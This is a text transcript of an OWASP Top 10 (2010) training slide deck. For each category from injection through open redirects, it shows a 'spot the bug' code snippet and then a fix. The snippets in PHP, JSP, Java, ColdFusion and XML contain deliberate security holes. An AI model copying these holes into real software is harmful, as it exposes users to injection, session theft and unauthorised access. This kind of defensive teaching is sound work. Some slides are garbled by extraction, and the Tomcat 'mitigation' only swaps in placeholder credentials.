OWASP Top 10 Bill Riggins III OWASP Orlando Co-Chapter Lead Top 10 for 2010 A1: Injection A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session.

Download Report

Transcript OWASP Top 10 Bill Riggins III OWASP Orlando Co-Chapter Lead Top 10 for 2010 A1: Injection A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session. 

OWASP Top 10
Bill Riggins III
OWASP Orlando Co-Chapter Lead
Top 10 for 2010
A1: Injection
A2: Cross-Site Scripting (XSS)
A3: Broken Authentication and Session Management
A4: Insecure Direct Object References
A5: Cross-Site Request Forgery (CSRF)
A6: Security Misconfiguration
A7: Insecure Cryptographic Storage
A8: Failure to Restrict URL Access
A9: Insufficient Transport Layer Protection
A10: Unvalidated Redirects and Forwards
A1: Injection
A1: Injection
Spot the Bug
<?php
$offset
$query
ORDER
$result
?>
= $_GET['offset'];
= "SELECT id, name FROM products
BY name LIMIT 20 OFFSET $offset;";
= pg_query($conn, $query);
A1: Injection
Spot the Bug Solution
<?php
$offset
$query
ORDER
$result
?>
= $_GET['offset'];
= "SELECT id, name FROM products
BY name LIMIT 20 OFFSET $offset;";
= pg_query($conn, $query);
A1: Injection
Spot the Bug Mitigation
<?php
$offset = $_GET['offset'];
$query = 'SELECT id, name FROM products
ORDER BY name LIMIT 20 OFFSET $1;';
$result = pg_query_params($dbconn, $query,
array($offset));
?>
A2: Cross-Site
Scripting (XSS)
A2: Cross-Site Scripting (XSS)
Spot the Bug
<!doctype html><html lang="en">
<head><title>XSS test</title></head>
<body>
<form>
<input type="text" name="xss">
<input type="submit">
</form>
<p>Result: ${param.xss}</p>
</body></html>
A2: Cross-Site Scripting (XSS)
Spot the Bug Solution
<!doctype html><html lang="en">
<head><title>XSS test</title></head>
<body>
<form>
<input type="text" name="xss">
<input type="submit">
</form>
<p>Result: ${param.xss}</p>
</body></html>
A2: Cross-Site Scripting (XSS)
Spot the Bug Mitigation
<!doctype html><html lang="en">
<head><title>XSS test</title></head>
<body>
<form>
<input type="text" name="xss">
<input type="submit">
</form>
<p>Result:
${fn:escapeXml(param.xss)}</p>
</body></html>
A3: Broken
Auth & Session
Mgmt.
A3: Broken Auth & Session Mgmt.
Spot the Bug
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png,
image/jpeg, image/gif, */*
Cookie: PHPSESSID=123456789
A3: Broken Auth & Session Mgmt.
Spot the Bug Solution
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png,
image/jpeg, image/gif, */*
Cookie: PHPSESSID=123456789
A3: Broken Auth & Session Mgmt.
Spot the Bug Mitigation
•
•
•
•
•
Use HTTPS for authorization checks
Use HTTPOnly and SecureOnly flags
Keep the session cookie out of the URL
Rotate session IDs after successful login
Etc, see OWASP documentation.
A4: Insecure
Direct Object
References
A4: Insecure Direct Object
References
Spot the Bug
String query = "SELECT * FROM accts WHERE
account = ?";
PreparedStatement pstmt =
connection.prepareStatement(query , ... );
pstmt.setString(1,request.getParameter("acct")
);
ResultSet results = pstmt.executeQuery();
A4: Insecure Direct Object
References
Spot the Bug Solution
String query = "SELECT * FROM accts WHERE
account = ?";
PreparedStatement pstmt =
connection.prepareStatement(query , ... );
pstmt.setString(1,request.getParameter("acct")
);
ResultSet results = pstmt.executeQuery();
A4: Insecure Direct Object
References
Spot the Bug Mitigation
String query = "SELECT * FROM accts WHERE
account = ? and acctOwner = ?";
PreparedStatement pstmt =
connection.prepareStatement(query , ... );
pstmt.setString(1,myUser.accts[0]);
pstmt.setString(2,myUser.id);
ResultSet results = pstmt.executeQuery();
A5: Cross-Site
Request Forgery
(CSRF)
A5: Cross-Site Request Forgery
Spot the Bug
<cfif IsUserLoggedIn() >
<cfset user = GetAuthUser() >
<cfset pageid = url.pageid>
<cfquery name="myquery
"datasource="myds">
UPDATE member_likes set like = 1 where
pageid = <cfqueryparam
cfsqltype="cf_sql_varchar" maxlength="250"
value="pageid" />
</cfquery></cfif><a
href="likeme.cfm?pageid=112">Like Me</a>
A5: Cross-Site Request Forgery
Spot the Bug Solution
<cfif IsUserLoggedIn() >
<cfset user = GetAuthUser() >
<cfset pageid = url.pageid>
<cfquery name="myquery
"datasource="myds">
UPDATE member_likes set like = 1 where
pageid = <cfqueryparam
cfsqltype="cf_sql_varchar" maxlength="250"
value="pageid" />
</cfquery></cfif><a
href="likeme.cfm?pageid=112">Like Me</a>
A5: Cross-Site Request Forgery
Spot the Bug Mitigation
<cfif IsUserLoggedIn() and (isdefined("form.csrfToken")) and
(CSRFVerifyToken(form.csrfToken))>
<cfset user = GetAuthUser() >
<cfset pageid = url.pageid>
<cfquery name="myquery "datasource="myds">
UPDATE member_likes set like = 1 where
pageid = <cfqueryparam
cfsqltype="cf_sql_varchar" maxlength="250"
value="pageid" />
</cfquery></cfif><cfset csrftoken = CSRFGenerateToken()/>
<cfform method="post" action="likeme.cfm">
<cfinput name="token" type="hidden" value="#csrfToken#"
/>
<cfinput name="pageid" type="hidden" value="31337" />
<cfinput name="Submit" type="submit" value="Like Me" />
</cfform>
A6: Security
Misconfiguration
A6: Security Misconfiguration
Spot the Bug
<?xml version="1.0" encoding="UTF-8"?><tomcatusers>
<role rolename="manager-gui"/>
<role rolename="manager-script"/>
<user username="tomcat" password="tomcat"
roles="manager-gui, managerscript"/></tomcat-users>
A6: Security Misconfiguration
Spot the Bug Solution
<?xml version="1.0" encoding="UTF-8"?><tomcatusers>
<role rolename="manager-gui"/>
<role rolename="manager-script"/>
<user username="tomcat" password="tomcat"
roles="manager-gui, managerscript"/></tomcat-users>
A6: Security Misconfiguration
Spot the Bug Mitigation
<?xml version="1.0" encoding="UTF-8"?><tomcatusers>
<role rolename="manager-gui"/>
<role rolename="manager-script"/>
<user username="myusername"
password="mypassword"
roles="manager-gui, managerscript"/></tomcat-users>
Also, see: https://www.owasp.org/index.php/Securing_tomcat
A7: Insecure
Cryptographic
Storage
A7: Insecure Cryptographic Storage
Spot the Bug
<?php$encryptedPassword =
sha1(strtolower('username') .
'password');?>
A7: Insecure Cryptographic Storage
Spot the Bug Solution
<?php$encryptedPassword =
sha1(strtolower('username') .
'password');?>
A7: Insecure Cryptographic Storage
Spot the Bug Mitigation
I may be shamed for this, but the answer is
(almost) always...
bcrypt.
A8: Failure to
Restrict URL
Access
A8: Failure to Restrict URL Access
Spot the Bug
<location path="Admin">
<system.web>
<authorization>
<allow users="*" />
</authorization>
</system.web>
</location>
A8: Failure to Restrict URL Access
Spot the Bug Solution
<location path="Admin">
<system.web>
<authorization>
<allow users="*" />
</authorization>
</system.web>
</location>
A8: Failure to Restrict URL Access
Spot the Bug Mitigation
<location path="Admin">
<system.web>
<authorization>
<allow users="briggins" />
<deny users="*" />
</authorization>
</system.web>
</location>
A9: Insufficient
Transport Layer
Protection
A9: Insufficient Transport Protection
Spot the Bug
A9: Insufficient Transport Protection
Spot the Bug Solution
A9: Insufficient Transport Protection
Spot the Bug Mitigation
<user-data-constraint>
<transport-guarantee>
CONFIDENTIAL
</transport-guarantee></user-data-constraint>
Also, see:
https://www.owasp.org/index.php/Securing_tomcat#Securing_Manager_WebApp
A10:
Unvalidated
Redirects and
Forwards
A10: Unvalidated Redirects,
Forwards
Spot the Bug
public class RedirectServlet extends
HttpServlet {
protected void doGet(HttpServletRequest
request,
HttpServletResponse response) throws
ServletException, IOException {
String query = request.getQueryString();
if (query.contains("url")) {
String url = request.getParameter("url");
response.sendRedirect(url);
}
}}
A10: Unvalidated Redirects,
Forwards
Spot the Bug Solution
public class RedirectServlet extends
HttpServlet {
protected void doGet(HttpServletRequest
request,
HttpServletResponse response) throws
ServletException, IOException {
String query = request.getQueryString();
if (query.contains("url")) {
String url = request.getParameter("url");
response.sendRedirect(url);
}
}}
A10: Unvalidated Redirects,
Forwards
Spot the Bug Mitigation
public class RedirectServlet extends
HttpServlet {
protected void doGet(HttpServletRequest
request,
HttpServletResponse response) throws
ServletException, IOException {
String query = request.getQueryString();
if (query.contains("goThere")) {
response.sendRedirect("http://mysite.com");
}
}}
What about _____?
This isn't just about JSP and PHP, or custom
code:
• http://www.didrailshaveamajorsecurityflawtoday.com/
• http://osvdb.org/search?search%5Bvuln_title%5D=csrf&search%5Btext_ty
•
•
•
•
pe%5D=alltext
http://osvdb.org/search?search%5Bvuln_title%5D=xss&search%5Btext_ty
pe%5D=alltext
http://osvdb.org/search?search%5Bvuln_title%5D=django&search%5Btext
_type%5D=alltext
http://osvdb.org/search?search%5Bvuln_title%5D=wordpress&search%5Bt
ext_type%5D=alltext
http://osvdb.org/search?search%5Bvuln_title%5D=drupal&search%5Btext
_type%5D=alltext
Resources
•
•
•
•
•
•
•
http://php.net/manual/en/security.database.sqlinjection.php
http://stackoverflow.com/questions/2905886/whatmakes-an-input-vulnerable-to-xss
http://www.exploit-db.com/papers/15990/
https://www.owasp.org/index.php/Top_10_2010-A4Insecure_Direct_Object_References
http://blogs.coldfusion.com/post.cfm/protecting-webapplications-from-csrf-attacks-with-coldfusion-10
http://www.troyhunt.com/2011/08/owasp-top-10-for-netdevelopers-part-8.html
http://cwe.mitre.org/data/definitions/601.html